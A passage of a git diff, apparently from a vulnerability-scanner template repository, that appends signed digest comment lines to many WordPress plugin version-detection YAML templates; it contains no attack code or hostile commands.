4a0a0047304502205a440437aeadfb3bf51ab52532460568cef9a29bfab7d6d4f3f119cec9a5e401022100dc041fce274b44ee9371bdc0d443a1b9f2cadeff7cd4e3862272b4d6d5a347ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..ab563aa984 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205db1e235b4c173f06ad77475ac37b3b8d5c51b3d18c95a095e8ef0f1b9fecbcf02203d279f85cdac0eb390aed99618cb0f2726e11ddd412b64415c72a288a7cb81c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..2ded55f13c 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203f43218438b6a32e1695f5167b60390b38f86728b53536697f7d12bb7d4a3790022100e41e0b753ee53ac3e4a7f48e9cea207b3129e655bb39f78264e8791a8e05e62f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..c356055f4b 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202833d9d96efb59ddcd8f65838ac9b956c57a9aaa196afdf6a5c0fdc20f00448a0220505448b63a137092cd9aec8907fdc9bf2359ce500965d13f2719a669934295dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..eac8d3fa10 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207f5a5603236be82a480f26eea8b46d07582c423c5049bf0e82879ea0d70cd3d80221009ec463b340304734eaaa49739b40f9f60b82935d3de6cc8bba833c3a504fb271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..7e74d8735d 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f8ed7c7e59192e2f205a83294a8791f52abe238ad71ccad5d8661291c84b4a76022020a5c4a2388cf514ee7d7c2f16145116249b799886ab0bfb468c59951ef0b3d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..03262a8a4b 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d0f507daba73c8248c43c9a93ed5410452fbea0a689a8f6761686d7cbf7afd4a02210084dadc02987394d7c20188ba89819cb8433eb75ff0c9f61090b32c30ce6e7393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index fe4c223cba..3603d7b896 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100be3841c78ced7493b4c8196c9449735c0649c2e433a5af149f9822dbc3a3446902210085f29f65784dc59cfa66e31e10d0ac9176debea5917692a099317b24efdff108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..6fe7c93da0 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f7c17a32fcdf7282b76bb9d4952bdbdd5442cba4e63f7cf5a64906efe27af2c1022100b1309ec7f47da7c812644f0d3736af5c123bc6053f9218a56e73a587e8b5c4f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..e46eaa929c 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b8a2c63dbfade636939d1465ca6f4b474d5695d7aa83344e49fe97c7b5594c53022100ddc4014dfeca87d6d9b726d9aab71083be79b056c64ac036ebde7877ef98108e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..393dc15889 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204db51b70cbdd72b8b8d37137407842846950b310dd129f0bdf16cfd0dcbef41b022100b2cc388542a9555f675d756b967c1602e73be05f7889552324f3afdd8dddca89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..1233a0ab1a 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100994052f8bdd864a8b2cc9cfb2dc3b921d011aa5d98480bd90b720e9d146bab98022016bb3b25aa5d38a04c114723a5bceded8c06365d73ca139318e72f460face4f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5ea77f898d..51733fcbcf 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022007b643d4262a1b37527a89e024a74f3d00401cd353a93cb83971bfca6814dcd00220431979eda650fd4e2026144c4f3aa6812b9cb94f26e8b4d87f1eee0a6b01e97a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..cf5e2563c9 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210095dacbe63ab57285362f89e052a5a6d829816b77115cfe84c4b3687cebc260fa02200ec297e041496571955661ff328a9f99134f8b40c35741e26136bfb8efd2129b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 554a7ddc52..4f0b2294fb 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022048f16e986a4441e5ce375c187de9551884b961549bee05e87a84496363017b41022100e149c49d0204f14f31e84ae8a70a2cb3c46a1b300104ee6143df4367e81cc46d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..70cbfc333a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022077020416f9dc430108239b22dc615bb613433577afb533a8ac9cb12566f090c1022100c31a0597bb0093ed5c9559634ae76c18f9e60b91110c889006e01b4492d0fe3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..956a4e073b 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e843e630ca74a8b83edcbd02508d803632b818c9d1e6bba174ed589fee8f5275022072359ee1811af3817a9031f70e2150cbd37de91fa8e3fc1ab80a688ea06a450e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..fbdd40f585 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009c4720b2c5eddf620de24cff361069e53ecc46fb2337cfe348e8b829bc1d8ec30220317b274c08fcd14fe8387b6f4982bb331eeb147dd66222e708b54161e419c305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..c933b5f1d8 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207b7001908905140ebe3738ef401aedcc69fbf3827f02b63195ffe4c6493b641d022030acecf8d2d0c634af8418659c28980b1132f5561fe1a6deec54d4a71e6163e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..3655c102a4 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206d2218029dca72a6d17d0f312ea33fb5b1b5276dd55054936b2af42b997a43170221008c0f5fc9226dd03310ea2492678e18002f2b6678fc325a27da61a8078fad11ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..00e6b4db3b 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a9f5b1fb9d01bd31c469b28c0683dacc1bad9d7941d2083ce7d181effc3cd70c022100b38254151eac96e637a758a45b168090c1b5ab772d40fecba1500216e230026f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..0b05499e0e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210094440f9db069c251066ee556c4935c28ec1f95f0a08b10588b2425204ae5cfad022100abb8a232e8498e9f9bdc8c375700c5508c9fc9bb1e6431139ca1f3b1a66dbe73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..b21da2c187 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008ed49c548872cf4896a22fca042a00937170eb9b4a05da5af0ef8aeaded369c7022100c04ec8d57c183eb4fad3202bcd87bdc827cfeca28ecdd8f4bee21a3ebff12ff0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index ce5dc03713..077fd7cd58 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022013227a14181e387280f6177d75da74b80d1a008a879542f15764ce4be0136c43022100f0427dd330b76c89517316d2f68f2a4ef5bdde6a75b534b2f7d71b0cea6ee783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..d296a03a68 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100afa3de76a6df687f45328302ce2708c7a2dc7098d9ca1c2570ac7e69ac4e6223022059d983226958a6f826212a0cb32c7254fe208e36fec5087c043caa51b97fe830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..86d414fe2d 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220178fbc22f0cea5bd7db7b587611a102513737306306e9dc520693eab922c01eb0220301783532c40a024cbd6720a6abfa4796c3d03834542790e71db17c11746e501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..6a4aca550c 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207f9aaf329a1a18267d211308c463e769a797afe3641cf941880c8cb2f1a3654b022100ffe5138572370fd699b621d79ae8c9f53e7fe2517edf3e40b7a8638b74402935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..d4cece88aa 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207f8657f4973cd1ba8e9a6c44249027eb8bcbbd5813fc9d157d8171f83946eef002203bb76a5e058edd42ef03fe3794efffe2ba146e0308008240df9a47778dd923c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 45260ccfba..da4ae1130c 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220651b1698eea9c9f476c8a0a1041ab0eae10c3c76ee17be3975b0857c01de699f0220195c43b14e31b143847fb2babe60836944ba9da7fd52877d54bb79205ceb0af2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..8ceba84542 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100facd5cd0407a5cd52cd02cddb83ecea8fea12939e1d6bcfbc404149946f6a83f0220640709b1fd58d4d91b194d76dce3b9c841a4d8ee54230cf1d107e274fbfb347c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..2dc00d3c1d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100caf04b4807b717467d83eb0dcb3e6458b93e6d667c8361f353185a363147890c022062325b5c995db687a5d7733d99c225b23b49f950cea213d48186f869364c0d60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 64cfced6cf..870e2ca97d 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100bd027786c2d99763822c3964c61c7c5c27e6b89d259139835a872a7b5e83b611022100a57fc22adcdb7214baed125a69fd9e539e7e36d0c535f47f5da60884ba2678c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..ab691c060d 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203b092ba8ed1e79772da08151c60e2f7153970192c24d6e572faade5df3e27d4f022100c21d93adad12ca127b0dd3d808a7e49592112487bd1c1b25cc60462f899336ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..e376fb7f6a 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022073eba7d7d5c269ff38d70d788e225b18ab987debe2d26d4a7ba07460b70a74f5022100eda428b8c7e102abeeeacb3c73f6bf0fd87b3ecd4cc38e50e5952a7bdf10c127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..aebe82c34c 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202ac3e7d0a30cf79109deafb8aa48afc249be3b9ca56294bcd183878a506a82a8022100979950cdeb8b73d855b30d54b0a84e287f08c39a30a3738e456098b9152e5960:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..a930c6fe96 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d3a26ed096968094d1198e7fd4c391c2d568981d29e07aa1636f074696bfe77b022050719b72e602467e0e9545518b49ebbd4533ec85d3681d5d69239c047f5f645a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..4363a59c38 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022021bd63dac6177fb106e9c9bfebd4f553e879789ea4738bb536222607e7b5171b022044b821f2eb141c3705574b362a8ff3ba61ada2377c555d81f694d53ea0daab19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..e5a959817d 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207518a515c600041eac5663fb821ef4aa5b7055f80049a2e143f93127a550d71602203c2711e2679ae9c645c2a3d6afbb4fa3bc17d8f381bcc7afd29b5662a714d2a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..a0c84958ed 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220133cd9f5aa75ad21d0f582395d32b12a0b599c8191147471222cc8d46c396c81022052c744dc382417be51b20785fa867ba126746b251d008509991f837204155116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..f48aacc200 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022057e87a07d284766a4ee61b59f088a996e46083d26a65ce58184cfc7355ae282602205a7016c7262e36fb27f8931b970ddbb4571be4c608a1d9eb826f4d31c5a14fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..2eced50370 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100876f200b2575cc0cc73bdbe2aa7af0af375aa88f9acf4e2628bdfdf12b71658e022100b196d72951204d0be7bb2bb378e45932dec1752c1ca956fa948f8ab72f8f22e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 4a68323ae1..122f432942 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a0e9bbfdeca00ad17c412bd987cd5b6c2d848f00773297377c0ef5bbf7cacf01022056ba369a0f816c010fff0e9f2b878bd2f08edac5654b3eeae78b6685e56d8c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..2cc1b20017 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220710c400fc70cf154ceec777e3c37cfc27a3fe8c84d062917f304c0a26a4110eb022100976bc620f9b21facf2aab5c036a977d266680cca9fef4425f23a2604caeb46d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..2e010f0603 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a81e279d6d55da391ef1fab8ff75eeb8cd85bb9a22772f93de44bdeeea9770a4022059fa44b7fcfe54187a0ac37fe023a30d1cb2b8b5a2b3bbc7ae08251c3d1b70ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..2f4fe32e01 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022050325a0fa83f29516b3cbaa6e957ed6d1ec66ffcb2064eae8e46ca70427dd901022100c3eb31e61748a0521df6a8b46b6da6d9874d0172c34b451e7669a062118765a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..499989f054 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100edd2d9736382c0c938001f0efb4cbe644eb581150f37ece86f41771fba49bc5e022028862ad59110c714ae4c959e0965665f6b55dd91e8b2e2fbfd8ab482d8b5111c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..76e0aee368 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210088321dfa43c6e5f6e879246d8bc65d498aa53ff1c8fe5f96e44e1f6033075847022100c2e16ad2814256160c910523705bcd3a5d7a4de68e13594f3b8b4a38d58cf8d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..3a4fed2830 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 